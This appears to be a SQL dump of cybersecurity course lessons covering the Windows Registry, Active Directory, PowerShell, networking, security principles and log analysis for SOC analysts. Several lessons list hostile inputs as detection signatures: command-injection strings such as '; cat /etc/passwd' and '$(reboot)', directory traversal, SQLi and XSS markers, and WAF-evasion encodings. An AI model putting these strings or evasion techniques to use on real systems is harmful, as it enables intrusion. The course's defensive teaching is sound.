(393, 34, '## The Windows Registry\n\nThe Registry is a massive hierarchical database storing ALL configuration settings.\n*   Tool: `regedit.exe`.\n\n### The 5 Hives (Root Keys)\n1.  **HKLM (HKEY_LOCAL_MACHINE)**: Settings for the computer (regardless of who is logged in).\n    *   `HKLMSoftware`: Installed programs.\n    *   `HKLMSystem`: Drivers, Services, Boot config.\n2.  **HKCU (HKEY_CURRENT_USER)**: Settings for YOU.\n    *   Wallpaper, theme, saved passwords.\n    *   Actually points to `HKUSID`.\n3.  **HKCR (Classes Root)**: File associations (open .pdf with Acrobat).\n4.  **HKU (Users)**: Stores profiles for all users.\n5.  **HKCC (Current Config)**: Hardware profile.\n\n### Persistence in Registry\nHackers love the registry because you can tell Windows to run malware at boot.\n*   **Run Keys**: `HKLMSoftwareMicrosoftWindowsCurrentVersionRun`. Anything here starts when ANY user logs in.\n*   **RunOnce**: Starts once then deletes itself.\n*   **Services**: `HKLMSystemCurrentControlSetServices`.\n\n### Forensics Value\n*   **ShimCache / AmCache**: Evidence of program execution (even if deleted).\n*   **shellbags**: Evidence of which folders were opened.\n*   **USBSTOR**: History of every USB drive ever plugged in.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(394, 35, '## Active Directory (AD)\n\nIf you work in a corporate environment, you use AD. It allows centralized management of users and computers.\n*   **Domain Controller (DC)**: The server running AD (usually Windows Server). It holds the database (`ntds.dit`).\n\n### Core Concepts\n1.  **Domain**: A security boundary. e.g., `corp.local`.\n2.  **Object**: Anything in the domain (User, Computer, Printer, Group).\n3.  **OU (Organizational Unit)**: Folders to organize objects (Sales, HR, IT). You apply policies (GPO) to OUs.\n4.  **Forest**: A collection of Domain Trees. The top level container.\n\n### Authentication: Kerberos vs NTLM\n*   **NTLM**: The old, challenge-response protocol. Vulnerable to \"Pass the Hash\".\n*   **Kerberos**: The standard. Uses \"Tickets\".\n    *   **TGT (Ticket Granting Ticket)**: Proof you are essentially authenticated.\n    *   **TGS (Ticket Granting Service)**: Proof you can access a specific service (like a File Share).\n    *   **Attacks**: Golden Ticket (Forging TGTs), Kerberoasting (Stealing Service Account hashes).\n\n### BloodHound\nA tool used by both Red and Blue teams to visualize AD relationships. It finds \"Attack Paths\" (e.g., User A is Admin on Computer B, where Admin C is logged in...).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(395, 36, '## PowerShell\n\nThe most powerful tool in Windows. It is an Object-Oriented shell.\n(`cmd.exe` is text-based. `powershell.exe` handles Objects).\n\n### Cmdlets (Command-lets)\nThey follow `Verb-Noun` syntax.\n*   `Get-Process`: List processes.\n*   `Stop-Service`: Stop a service.\n*   `New-Item`: Create a file.\n\n### Aliases\nShortcuts for Linux users.\n*   `ls` -> `Get-ChildItem`\n*   `cat` -> `Get-Content`\n*   `wget` -> `Invoke-WebRequest`\n\n### The Pipeline `|`\nPasses objects.\n*   `Get-Process | Sort-Object CPU -Descending | Select-Object -First 5`\n    *   Get all processes.\n    *   Sort them by CPU usage.\n    *   Show only top 5.\n\n### PowerShell for Hackers\n*   **Fileless Malware**: Running a script strictly in memory (RAM). No file touches the disk, so Antivirus often misses it.\n*   **Execution Policy**: A safety feature, not security.\n    *   `Set-ExecutionPolicy Bypass`: Ignores the restrictions.\n*   **Logging**: Script Block Logging (Event 4104) is the only way to catch malicious PowerShell.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(396, 37, '## Windows Event Logs\n\nThe \"Black Box\" of Windows. Stored in `.evtx` format.\nViewer: `Event Viewer` (`eventvwr.msc`).\n\n### Main Logs\n1.  **Security**: Logins, Privilege use. (Most important for us).\n2.  **System**: Drivers, Service crashes, Reboot.\n3.  **Application**: App crashes (SQL Server logs, etc).\n\n### Critical Event IDs to Memorize\nIf you are a SOC Analyst, tattoo these on your arm.\n\n*   **4624**: Successful Logon.\n    *   Look at **Logon Type**:\n        *   Type 2: Interactive (Keyboard/Local).\n        *   Type 3: Network (SMB/Shared Folder).\n        *   Type 10: RDP (Remote Desktop).\n*   **4625**: Failed Logon. (Brute force indicator).\n*   **4720**: User Created. (Did a hacker add a backdoor user?).\n*   **4672**: Special Privileges Assigned. (Admin logon).\n*   **1102**: Audit Log Cleared. (Hacker trying to cover tracks. HUGE RED FLAG).\n*   **7045**: Service Installed (System Log). (Persistence mechanism).\n\n### Sysmon (System Monitor)\nDefault Windows logs are okay. **Sysmon** (from Sysinternals) is amazing. It logs process creation, network connections, and DNS Lookups.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(397, 38, '## Group Policy (GPO)\n\nGroup Policy Objects allows Admins to push settings to thousands of computers at once.\n*   \"Disable Control Panel for all HR employees.\"\n*   \"Set the wallpaper to company logo.\"\n*   \"Install Chrome on all computers.\"\n\n### Structure\n*   **Computer Configuration**: Applies to the machine (starts at boot).\n*   **User Configuration**: Applies to the user (starts at login).\n\n### The Refresh\nGPO is not instant.\n*   `gpupdate /force`: Command to force a sync with the DC.\n*   Refreshes every 90 minutes by default.\n\n### Abuse\nIf a hacker compromises a Domain Admin account, they can create a malicious GPO to deploy Ransomware to every PC in the company instantly. This is how massive breaches happen.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(398, 39, '## Windows Security Tools\n\nBuilt-in and Sysinternals tools you should know.\n\n### Native Tools\n*   **Task Manager**: Identify resource hogs.\n*   **Resource Monitor**: Detailed network/disk view.\n*   **Windows Defender Firewall**: Controls Inbound/Outbound traffic.\n*   **BitLocker**: Full Disk Encryption. Protects data if laptop is stolen.\n\n### Sysinternals Suite\nA set of free tools active maintained by Mark Russinovich (Azure CTO).\n1.  **Process Explorer**: \"Task Manager on steroids\". Shows DLLs loaded, handles open, and verify file signatures (detect malware pretending to be Microsoft).\n2.  **Process Monitor (ProcMon)**: Real-time logs of File System, Registry, and Network activity.\n    *   *Use*: Run malware, watch ProcMon to see what files it creates.\n3.  **Autoruns**: Shows EVERYTHING that starts at boot. (Registry run keys, Scheduled Tasks, Services, Drivers). Best tool for finding persistence.\n4.  **TCPView**: Real-time view of open ports and connections.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(416, 22, '## The OSI Model\n\nThe **Open Systems Interconnection** model describes how data moves from one computer to another. It has 7 Layers.\n\"**P**lease **D**o **N**ot **T**hrow **S**ausage **P**izza **A**way\"\n\n### The Layers (Bottom Up)\n1.  **Physical (Layer 1)**: The cables, fiber optics, and radio waves (WiFi). Bits (0s and 1s).\n    *   *Device*: Hub, Cable.\n    *   *Attack*: Wiretapping, Jamming.\n2.  **Data Link (Layer 2)**: MAC Addresses (Physical usage). Switches operate here.\n    *   *Unit*: Frame.\n    *   *Attack*: ARP Spoofing.\n3.  **Network (Layer 3)**: IP Addresses (Logical usage). Routers operate here.\n    *   *Unit*: Packet.\n    *   *Attack*: Ping Flood.\n4.  **Transport (Layer 4)**: TCP/UDP. Ports. Reliability.\n    *   *Unit*: Segment.\n    *   *Attack*: SYN Flood (DoS).\n5.  **Session (Layer 5)**: Establishing and ending connections (Sessions).\n6.  **Presentation (Layer 6)**: Encryption (SSL/TLS) and formatting (JPEG/ASCII).\n7.  **Application (Layer 7)**: The software you use (HTTP, DNS, SMTP).\n\n### Interaction\nWhen you click a link:\n*   **Encapsulation**: Data goes DOWN the stack (L7 -> L1) adding headers at each layer.\n*   **Decapsulation**: Data goes UP the stack (L1 -> L7) stripping headers.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(417, 23, '## TCP/IP Protocol Suite\n\nThe ISO model is theoretical. TCP/IP is what we actually use.\n\n### TCP (Transmission Control Protocol)\n**Connection-Oriented**. \"Reliable\".\n1.  **The 3-Way Handshake**:\n    *   **SYN** (Client): \"Hi, can we talk?\"\n    *   **SYN-ACK** (Server): \"Yes, I am open.\"\n    *   **ACK** (Client): \"Great, here is data.\"\n2.  **Guarantees Delivery**: If a packet is lost, TCP resends it.\n3.  **Use Case**: Web browsing (HTTP), Email (SMTP), File Transfer (FTP). You don\'t want a missing pixel in your file.\n\n### UDP (User Datagram Protocol)\n**Connection-less**. \"Fire and Forget\".\n1.  No Handshake. No Guarantee.\n2.  The sender just blasts data. If you miss it, tough luck.\n3.  **Use Case**: Streaming Video, VoIP (Voice), DNS.\n    *   *Why?* Speed. If you drop a frame in a video, you don\'t want to pause and wait for it to resend. You just move to the next frame.\n\n### Headers\n*   **TCP Header**: Source Port, Dest Port, Sequence Number, Flags (SYN/ACK/FIN/RST).\n*   **IP Header**: Source IP, Dest IP, TTL (Time To Live).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(418, 24, '## IP Addressing\n\nEvery device needs an IP.\n*   **IPv4**: 32-bit. `192.168.1.1`. (Running out).\n*   **IPv6**: 128-bit. `2001:db8::1`. (The future).\n\n### IPv4 Classes\n*   **Class A**: `1.0.0.0` to `126.x.x.x` (Huge networks).\n*   **Class B**: `128.0.0.0` to `191.x.x.x` (Universities).\n*   **Class C**: `192.0.0.0` to `223.x.x.x` (Small networks).\n\n### Private IPs (RFC 1918)\nThese IPs do not route on the internet. Used for LANs.\n*   `10.0.0.0` - `10.255.255.255`\n*   `172.16.0.0` - `172.31.255.255`\n*   `192.168.0.0` - `192.168.255.255`\n*   **Loopback**: `127.0.0.1` (Localhost).\n\n### Subnetting (CIDR)\nSplitting a network into smaller chunks.\n*   `/24` (Subnet Mask `255.255.255.0`):\n    *   First 3 octets match (`192.168.1.x`).\n    *   Only the last octet changes.\n    *   **Hosts**: 254 usable IPs (`1-254`).\n*   `/16` (Mask `255.255.0.0`):\n    *   **Hosts**: 65,534.\n*   `/32`: A single IP.\n\n**Calculation**:\nNumber of IPs = $2^{(32 - CIDR)}$.\n*   `/30` = $2^2$ = 4 IPs. (Minus Network and Broadcast = 2 usable). Used for Router-to-Router links.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(419, 25, '## Subnetting Cheat Sheet\n\nCalculating subnets is a core skill for certifications (Network+, CCNA).\n\n### The Magic Number Method\nFind the \"Interesting Octet\" (The one where the mask is not 0 or 255).\n\n**Scenario**: Network `192.168.10.0 /26`.\n1.  **Prefix**: /26.\n2.  **Octet**: 26 is in the 4th octet (24 + 2).\n3.  **Mask**: /26 means `11000000` in binary.\n    *   `128 + 64 = 192`. So Mask is `255.255.255.192`.\n4.  **Block Size**: 256 - Mask (192) = **64**.\n\nThis means networks jump by 64.\n*   Subnet 1: `192.168.10.0` - `192.168.10.63`\n*   Subnet 2: `192.168.10.64` - `192.168.10.127`\n*   Subnet 3: `192.168.10.128` - `192.168.10.191`\n*   Subnet 4: `192.168.10.192` - `192.168.10.255`\n\n### Usable Hosts\nFormula: `Block Size - 2`.\n*   Take Subnet 1: Range 0-63.\n*   **0** is Network Address.\n*   **63** is Broadcast Address.\n*   **Usable**: 1-62.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(420, 26, '## DNS (Domain Name System)\n\nDNS turns human names (`google.com`) into computer IPs (`142.250.72.14`).\n\n### The DNS Hierarchy\n1.  **Root Hints (.)**: The 13 root servers worldwide. They know who handles `.com`, `.org`, etc.\n2.  **TLD (Top Level Domain)**: The `.com` servers. They know who handles `google.com`.\n3.  **Authoritative Name Server**: Google\'s actual server. It knows the IP.\n\n### The Resolution Process\nYou type `google.com`.\n1.  **PC**: Checks local cache / HOSTS file.\n2.  **Recursive Resolver (ISP/8.8.8.8)**: \"I don\'t know. I\'ll ask Root.\"\n3.  **Root**: \"I don\'t know, ask .COM server.\"\n4.  **.COM**: \"I don\'t know, ask ns1.google.com.\"\n5.  **ns1.google.com**: \"I know! It is 1.2.3.4.\"\n6.  **Resolver**: Caches it and gives it to PC.\n\n### Record Types\n*   **A**: IPv4.\n*   **AAAA**: IPv6.\n*   **MX**: Mail Server.\n*   **CNAME**: Alias.\n*   **PTR**: Reverse DNS (IP -> Name). Used for email filtering.\n*   **TXT**: Arbitrary text (SPF/DMARC).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(421, 27, '## DHCP and ARP\n\nHow you join a network.\n\n### DHCP (Dynamic Host Configuration Protocol)\nAutomates assigning IPs.\n**The DORA Process**:\n1.  **Discover**: Client shouts (Broadcast): \"IS ANY DHCP SERVER HERE?\"\n2.  **Offer**: Server says: \"I can give you IP `192.168.1.100`\".\n3.  **Request**: Client says: \"I will take it!\"\n4.  **Acknowledge**: Server says: \"It yours for 24 hours.\"\n\n### ARP (Address Resolution Protocol)\nMaps IP (Logic) to MAC (Physical).\n*   Switch knows MACs. Router knows IPs.\n*   When you ping `192.168.1.5` on a LAN:\n    1.  PC checks ARP Table: \"Do I know the MAC for 192.168.1.5?\"\n    2.  If No: Broadcast \"WHO HAS 192.168.1.5? TELL 192.168.1.2\".\n    3.  Device replies \"I have it! My MAC is AA:BB:CC...\".\n    4.  PC sends frame to AA:BB:CC.\n\n**ARP Spoofing (Man in the Middle)**:\nHacker replies \"I am 192.168.1.5!\" to the PC, and \"I am the Router!\" to the Gateway. Now all traffic flows through the Hacker.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(422, 28, '## Common Protocols & Ports\n\nMemorize these.\n\n| Port | Protocol | Service | Secure? |\n|---|---|---|---|\n| **20/21** | FTP | File Transfer | No (Cleartext) |\n| **22** | SSH | Secure Shell (Remote Linux) | **Yes** |\n| **23** | Telnet | Telemetry (Remote CLI) | No (Cleartext) |\n| **25** | SMTP | Email Sending | No (Use 587) |\n| **53** | DNS | Domain Name System | No (DNSSEC exists) |\n| **80** | HTTP | Web Traffic | No |\n| **443** | HTTPS | Encrypted Web Traffic | **Yes** (TLS) |\n| **110** | POP3 | Email Retrieval | No |\n| **143** | IMAP | Email Retrieval | No |\n| **3389** | RDP | Remote Desktop (Windows) | Yes |\n| **445** | SMB | Windows File Share | No (v1/v2 vulnerable) |\n\n### Traffic Analysis\n*   **Cleartext** protocols (HTTP, Telnet, FTP) show passwords in Wireshark.\n*   **Encrypted** protocols (HTTPS, SSH) show garbage characters.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(424, 30, '# Scenario: The Suspicious Login\n\n**Background**: You are a SOC Analyst. You received an alert about \"Cleartext Credentials\" on the network. You open the PCAP file in Wireshark.\n\n## Investigation Data\n*   **Packet 12**: Protocol: HTTP. Source: 192.168.1.105. Dest: 104.21.55.2.\n*   **Info**: POST /login.php HTTP/1.1\n*   **Packet 12 Details**:\n    *   Form item: \"username\" = \"admin\"\n    *   Form item: \"password\" = \"SuperSecret123\"\n\n## Analysis\n1.  The user logged into a website using **HTTP**, not HTTPS.\n2.  Because it was HTTP, the data was sent in **Plaintext**.\n3.  Anyone on the same WiFi could have captured this packet and stolen the credentials.\n\n## Mitigation\n*   Always enforce **HTTPS** (TLS/SSL).\n*   Use certificate pinning.\n*   Educate users to look for the \"Padlock\" icon.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(425, 31, '# Final Module Quiz\n\nReview the key concepts from this module:\n*   OSI Layers & TCP/IP\n*   IP Addressing & Subnets\n*   Common Protocols (SSH, HTTP, DNS)\n*   Packet Analysis Basics\n\nYou are now ready to tackle real-world networking scenarios.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(434, 40, '## The CIA Triad\n\nThe cornerstone of Information Security. Every decision balances these three.\n\n1.  **Confidentiality**: Keeping secrets secret.\n    *   **Goal**: Only authorized people can read data.\n    *   **Tools**: Encryption (AES), Access Control Lists (ACLs), Steganography.\n    *   **Failure**: Data Breach (Equifax).\n2.  **Integrity**: Trusting the data.\n    *   **Goal**: Data has not been tampered with.\n    *   **Tools**: Hashing (SHA256), Digital Signatures.\n    *   **Failure**: An attacker changing a bank transfer from $10 to $10,000.\n3.  **Availability**: Accessing the data.\n    *   **Goal**: Systems are up and running.\n    *   **Tools**: Redundancy (RAID), Backups, Load Balancers.\n    *   **Failure**: DDOS Attack, Ransomware (Encrypting files makes them unavailable).\n\n### The Balancing Act\nYou cannot have 100% of all three.\n*   To make a system perfectly Confidential (unplug internet), you hurt Availability.\n*   To make it perfectly Available (Open wifi), you hurt Confidentiality.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(435, 41, '## Authentication (AuthN)\n\n\"Who are you?\"\n\n### The Three Factors\n1.  **Type 1: Something you Know**: Password, PIN, Mother\'s Maiden Name.\n    *   *Weakness*: Can be guessed or phished.\n2.  **Type 2: Something you Have**: Smart Card, Phone (SMS Code), YubiKey.\n    *   *Weakness*: Can be stolen or lost.\n3.  **Type 3: Something you Are**: Biometrics (Fingerprint, Retina, FaceID).\n    *   *Weakness*: Privacy concerns. You can\'t reset your face if it is compromised.\n\n### MFA (Multi-Factor Authentication)\nCombining two *different* factors.\n*   Password + PIN = **NOT MFA** (Both are Type 1).\n*   Password + SMS Code = **MFA** (Type 1 + Type 2).\n*   **Impact**: MFA stops 99.9% of automated account takeovers.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(436, 42, '## Authorization (AuthZ)\n\n\"What are you allowed to do?\"\n(AuthN happens first, then AuthZ).\n\n### Models\n1.  **DAC (Discretionary Access Control)**:\n    *   The owner decides. (Windows/Linux file permissions).\n    *   \"I created this file, I let Bob read it.\"\n2.  **MAC (Mandatory Access Control)**:\n    *   The System decides based on labels. (Military).\n    *   \"User is SECRET. File is TOP SECRET. User cannot read.\"\n3.  **RBAC (Role Based Access Control)**:\n    *   Access based on job function. (Corporate).\n    *   \"Bob is in HR Group. HR Group can read Payroll.\" (Best for scaling).\n4.  **ABAC (Attribute Based)**:\n    *   \"User can read file IF location=Office AND time=9am-5pm.\" (Zero Trust).', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(437, 43, '## Accounting (Non-Repudiation)\n\n\"What did you do?\"\nTracking user actions to ensure accountability.\n\n### Logging\n*   **Who**: user `jsmith`.\n*   **What**: Accessed `salary_database.db`.\n*   **When**: `2024-12-25 04:00:00`.\n*   **Where**: From IP `10.5.5.5`.\n\n### Non-Repudiation\nProof that someone did something so they cannot deny it later.\n*   **Digital Signatures**: If I sign an email with my Private Key, I cannot claim \"I didn\'t write that\", because only I have the key.\n*   **Audit Trails**: Logs sent to a central SIEM that users cannot delete.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(438, 44, '## Encryption Basics\n\nTurning \"Plaintext\" into \"Ciphertext\".\n\n### Symmetric Encryption (Shared Key)\n*   **Concept**: Same key locks and unlocks.\n*   **Algorithms**: AES (Advanced Encryption Standard), DES (Legacy), 3DES.\n*   **Pros**: Fast. Good for large data (Hard Drives, Zip files).\n*   **Cons**: Key Distribution problem. How do I send you the key securely?\n\n### Asymmetric Encryption (Public Key)\n*   **Concept**: Key Pair.\n    *   **Public Key**: You give to everyone. Encrypts data.\n    *   **Private Key**: You accept. Decrypts data.\n*   **Algorithms**: RSA, ECC (Elliptic Curve).\n*   **Pros**: Secure key exchange.\n*   **Cons**: Slow. CPU intensive.\n\n### Hybrid Encryption (HTTPS/TLS)\nWe use Asymmetric to exchange the key, then Symmetric to transfer the data. best of both worlds.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(439, 45, '## Hashing vs Encryption\n\nThey are often confused but are opposite concepts.\n\n| Feature | Encryption | Hashing |\n|---|---|---|\n| **Reversible?** | **YES** (with key). | **NO** (One-way). |\n| **Purpose** | Confidentiality. | Integrity. |\n| **Output Size** | Variable (Depends on input). | Fixed (e.g., 256 bits). |\n| **Examples** | AES, RSA. | SHA-256, MD5. |\n\n### Hashing Use Cases\n1.  **Password Storage**: Never save passwords as text. Save the hash. When user logs in, hash their input and compare it to the database.\n2.  **File Integrity**: Download a file. Check its MD5. If it matches the website, the file involves no corruption or malware injection.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(440, 46, '## Defense in Depth (Layered Security)\n\nDo not rely on one wall. If the wall fails, you lose. Use multiple layers.\nThe \"Onion\" approach.\n\n### The Layers\n1.  **Policies/User**: Training, Strong Passwords.\n2.  **Physical**: Locks, Cameras, Guards.\n3.  **Perimeter**: Firewall, DMZ.\n4.  **Network**: VLANs, NAC (Network Access Control).\n5.  **Host**: Antivirus, EDR, Patching.\n6.  **Application**: Secure Code, Input Validation.\n7.  **Data**: Encryption, ACLs.\n\n### Example\nA hacker wants your database.\n1.  **Firewall** blocks their port scan. (Layer 3).\n2.  They Phish a user. **Email Filter** misses it.\n3.  User clicks link. **EDR** detects the malware download and blocks it. (Layer 5).\n**Defense in Depth worked**.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(441, 47, '# Final Module Quiz\n\nProve your mastery of Security Principles.\nTopics:\n*   CIA Triad (Confidentiality, Integrity, Availability)\n*   AAA (AuthN, AuthZ, Accounting)\n*   Encryption & Hashing\n*   Defense in Depth\n\nGood luck!', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-26 20:58:02'),
(447, 48, '## Windows CLI Navigation\n\nThe Command Prompt (`cmd.exe`) is the legacy shell, but still essential.\n\n### Directories\n*   `dir`: List files (Like `ls` in Linux).\n*   `cd`: Change directory.\n    *   `cd Desktop`\n    *   `cd ..` (Up one level).\n    *   `cd ` (Back to C: root).\n*   `d:`: Switch to D drive. (Just type the letter).\n\n### Files\n*   `type file.txt`: Read a file (Like `cat`).\n*   `del file.txt`: Delete.\n*   `copy file.txt backup.txt`: Copy.\n*   `move file.txt folder`: Move.\n*   `ren file.txt new.txt`: Rename.\n\n### Tips\n*   **Tab Completion**: Type `cd Des` and hit Tab.\n*   **cls**: Clear screen.\n*   **help [command]**: `help dir`.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(448, 49, '## Advanced File Reading\n\n### Searching\n*   `findstr`: The Windows grep.\n    *   `findstr \"password\" config.txt`: Search for string.\n    *   `findstr /S /I \"password\" *.txt`: Recursive (/S) and Case-Insensitive (/I) search in all text files.\n\n### Redirection\n*   `>`: Overwrite. `echo hello > file.txt`.\n*   `>>`: Append. `echo world >> file.txt`.\n*   `|`: Pipe. `type log.txt | findstr \"error\"`.\n\n### Attributes\nFiles can be Hidden.\n*   `attrib`: Show attributes.\n*   `attrib +h file.txt`: Hide it.\n*   `attrib -h file.txt`: Unhide it.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(449, 50, '## Who am I?\n\nEnumerating the host you are on.\n\n### Commands\n1.  `hostname`: Computer Name.\n2.  `whoami`: Current user (`DOMAINUser`).\n    *   `whoami /priv`: Show my privileges (Look for *SeDebugPrivilege*).\n    *   `whoami /groups`: Show my groups (Look for *Administrators*).\n3.  `systeminfo`: Huge dump of OS version, Hotfixes (Patches), and Domain.\n    *   *Hack*: `systeminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"`', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(450, 51, '## Network Configuration\n\n### Ipconfig\n*   `ipconfig`: IP, Subnet Mask, Gateway.\n*   `ipconfig /all`: + MAC Address, DNS Servers, DHCP info.\n*   `ipconfig /release` & `ipconfig /renew`: Refresh DHCP.\n*   `ipconfig /flushdns`: Clear DNS cache.\n\n### Ping & Tracert\n*   `ping google.com`: Test connectivity. (Uses ICMP).\n*   `tracert google.com`: Trace the hops to the destination. (Shows which routers you pass through).\n\n### Netstat\nNetwork Statistics.\n*   `netstat -an`: Show all open ports and connections.\n*   `netstat -ano`: Show PIDs (So you can kill the process using the port).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(451, 52, '## Tasklist & Taskkill\n\nManaging processes from CLI.\n\n### Tasklist\n*   `tasklist`: Lists all running processes and PIDs.\n*   `tasklist /svc`: Shows which **Service** creates the process. (Great for `svchost.exe`).\n*   `tasklist /m`: Lists DLLs used by each process.\n\n### Taskkill\n*   `taskkill /PID 1234`: Kill by ID.\n*   `taskkill /IM notepad.exe`: Kill by Image Name.\n*   `taskkill /F /IM notepad.exe`: **Force** kill. (Like `kill -9`).', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(460, 54, '## Anatomy of a Log: Reading the Matrix\n\nA log is just a text record of \"Software doing something\".\n\n### The 3 Pillars of Observability\n1.  **Logs**: Discrete events (The error happened at 2:01 PM).\n2.  **Metrics**: Aggregated numbers (CPU usage was 80%).\n3.  **Traces**: The journey of a request across services.\n\n### Common Log Formats\n*   **Syslog (The Standard)**: `Dec 29 10:00:00 hostname sshd[1234]: Failed password for root from 1.2.3.4`.\n*   **JSON (The Modern)**: `{\"timestamp\": \"2025-12-29T10:00:00\", \"host\": \"web01\", \"level\": \"ERROR\"}`.\n*   **CEF (Common Event Format)**: Used by ArcSight. `CEF:0|Vendor|Product|Version|ID|Name|Sev|Extension`.\n\n### Why Analysts Hate Unstructured Logs\nIf a developer logs: `Error: Something bad happened.`\n*   It tells you **nothing**.\n*   A good log answers: **Who? What? Where? When?**\n\n### The Timestamp Problem\n*   **Timezones**: Is the log in UTC or EST? If you correlate a UTC firewall log with an EST server log, you will be 5 hours off, and you will miss the attack.\n*   **Rule**: Always set servers to UTC.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:02'),
(461, 55, '## SSH Authentication Logs\n\nThe most attacked service on the internet.\n\n### /var/log/auth.log (or secure)\nIf you open a Linux server to the internet on Port 22, you will see this 5 seconds later:\n\n*   **Failed Password**:\n    `Invalid user admin from 192.168.1.5`\n    `Failed password for invalid user admin from 192.168.1.5 port 22 ssh2`\n    *   This is a Dictionary Attack (Brute Force).\n\n*   **Successful Login**:\n    `Accepted password for root from 192.168.1.5 port 22 ssh2`\n    `pam_unix(sshd:session): session opened for user root`\n    *   **Alert**: If you see this from a strange IP -> **Immediate Incident**.\n\n### Public Key Auth (The Secure Way)\n`Accepted publickey for root from 1.2.3.4...`\n*   This means they used an SSH Key file (`id_rsa`), not a password.\n*   It is much harder to brute force.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 16:31:03'),
(462, 56, '## Web Access Logs (Apache/Nginx)\n\nFormat: `IP - User - Date - \"Request\" - Status - Bytes - Referrer - UserAgent`\n\n### Status Codes\n*   **200 OK**: Request succeeded. (The page loaded).\n*   **301/302 Redirection**: Moved.\n*   **404 Not Found**: Client requested junk.\n    *   *Security Note*: High volume of 404s suggests a **Fuzzing/Dirbusting** attack (Looking for hidden files).\n*   **403 Forbidden**: Access Denied.\n*   **500 Internal Server Error**: The server crashed.\n    *   *Security Note*: A 500 often means an Exploit (SQLi or RCE) broke the application logic. Investigate 500s!', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(463, 57, '## Windows Logs (Security)\n\nFocus on **Event ID 4624 (Logon Success)** and **4625 (Failure)**.\n\n### Logon Types\nThe key field in Event 4624.\n*   **Type 2**: Interactive. (Someone sat at the keyboard).\n*   **Type 3**: Network. (Someone accessed a Shared Folder or mapped a drive).\n    *   *Note*: Psexec uses Type 3.\n*   **Type 10**: RemoteDesktop. (RDP).\n    *   *Note*: The source IP is logged here. Crucial for tracking RDP attacks.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(464, 58, '## Detecting Web Attacks via Logs\n\n### SQL Injection (SQLi)\nLook for SQL syntax in the URL/URI.\n*   `UNION SELECT`\n*   `OR 1=1`\n*   `%27` (Single Quote encoded).\n\n### Cross Site Scripting (XSS)\nLook for HTML/JS tags.\n*   `<script>`\n*   `alert(1)`\n*   `%3Cscript%3E`\n\n### Directory Traversal\nTrying to escape the web root.\n*   `../../../../etc/passwd`\n*   `..%2F..%2F` (Encoded).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(465, 59, '## Firewall Logs\n\nUsually very simple but high volume.\n*   `ALLOW TCP 192.168.1.5:54332 -> 8.8.8.8:53`\n*   `DENY TCP 1.2.3.4:445 -> 192.168.1.1:445`\n\n### Indicators\n1.  **Outbound DENY**: Internal host trying to reach a blocked service (e.g., Malware trying to connect to C2 on port 6667 IRC).\n2.  **Internal Scanning**: One internal IP connecting to 445 on ALL other IPs. (Lateral Movement / Worm).\n3.  **Beaconing**: Regular connections to the same external IP every 60 seconds. (C2 Heartbeat).', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(466, 60, '## Detecting Command Injection\n\nWhen input meant for a form is passed to a System Shell.\n\n### Signatures\n*   `; cat /etc/passwd` (The semicolon chains commands).\n*   `| whoami`\n*   `$(reboot)`\n*   `&& ping 1.1.1.1`\n\n### Review\nIf you see these characters `; | $ &` in a Username or Search field in your logs, you are being attacked.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
(467, 61, '## Advanced Obfuscation\n\nAttackers hide their payloads to bypass WAFs (Web Application Firewalls).\n\n### Techniques\n1.  **URL Encoding**: `select` -> `%73%65%6C%65%63%74`.\n2.  **Double URL Encoding**: `%252E` (Encodes the % sign).\n3.  **Case Variation**: `SeLeCt * FrOm`.\n4.  **Whitespace**: `SELECT/**/Password/**/FROM` (SQL ignores comments, WAF might get confused).\n\n### De-obfuscation\nThe Analyst\'s job is to decode the string back to plaintext to understand the intent via tools like CyberChef.', 'markdown', 10, '2025-12-26 21:12:59', '2025-12-29 14:05:38'),
